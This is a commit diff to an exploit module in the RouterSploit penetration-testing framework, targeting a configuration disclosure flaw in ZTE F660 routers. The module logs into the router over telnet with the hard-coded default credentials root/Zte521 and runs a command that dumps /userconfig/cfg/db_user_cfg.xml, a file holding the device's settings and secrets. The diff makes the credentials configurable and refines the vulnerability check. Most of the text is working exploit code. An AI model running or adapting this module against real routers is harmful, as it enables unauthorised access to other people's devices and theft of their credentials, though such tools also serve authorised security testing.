Fix exploits ZTE F660 Config Disclosure

5d5a2e16 · devilscream · 0e94b3f1 · 5d5a2e16
Commit 5d5a2e16 authored May 03, 2016 by devilscream
Hide whitespace changes
Inline Side-by-side

Showing with 8 additions and 11 deletions

f660_config_disclosure.py routersploit/modules/exploits/zte/f660_config_disclosure.py +8 -11

No files found.
--- a/routersploit/modules/exploits/zte/f660_config_disclosure.py
+++ b/routersploit/modules/exploits/zte/f660_config_disclosure.py
@@ -9,18 +9,17 @@ from routersploit import (

 class Exploit(exploits.Exploit):
    """
-    Exploit implementation for ZTE F660 config disclosure vulnerability.
+    Exploit implementation for ZTE F660 Config Disclosure.
    If the target is vulnerable it is possible to authenticate to the device"
    """
    __info__ = {
        'name': 'ZTE F660 Config Disclosure',
-        'description': 'Module exploits ZTE F660 config disclosure vulnerability. If the target is is possible to authentiate to the device.',
+        'description': 'Module exploits ZTE F660 Config Disclosure. If the target is possible to authentiate to the device.',
        'authors': [
-            'devilscream',  # vulnerability discovery
-            'Marcin Bury <marcin.bury[at]reverse-shell.com>',  # routersploit module
+            'devilscream'  # vulnerability discovery
        ],
        'references': [
-            '',
+            'http://www.ironbugs.com/2016/02/hack-and-patch-your-zte-f660-routers.html'
        ],
        'devices': [
            'ZTE ZXA10 F660'
@@ -28,9 +27,8 @@ class Exploit(exploits.Exploit):
    }

    target = exploits.Option('', 'Target address e.g. 192.168.1.1')  # target address
-
-    username = "root"
-    password = "Zte521"
+    username = exploits.Option("root", "Username to authenticate with") # telnet username, default root
+    password = exploits.Option("Zte521", "Password to authenticate with") # telnet password, default Zte521
    config = "cat /userconfig/cfg/db_user_cfg.xml"

    def run(self):
@@ -50,7 +48,6 @@ class Exploit(exploits.Exploit):
                if any(map(lambda x: x in res, ["#", "$", ">"])):
                    print_success("Telnet - Successful authentication")
                    tn.write(self.config + "\r\n")
-                    tn.interact()

            tn.close()
        except:
@@ -64,7 +61,7 @@ class Exploit(exploits.Exploit):
            tn.write(self.username + "\r\n")
            tn.expect(["Password: ", "password"], 5)
            tn.write(self.password + "\r\n")
-            tn.write("\r\n")
+            tn.write(self.config + "\r\n")

            (i, obj, res) = tn.expect(["Incorrect", "incorrect"], 5)
            tn.close()
@@ -72,7 +69,7 @@ class Exploit(exploits.Exploit):
            if i != -1:
                return False
            else:
-                if any(map(lambda x: x in res, ["#", "$", ">"])):
+                if any(map(lambda x: x in res, ["<DM name="])):
                    tn.close()
                    return True
            tn.close()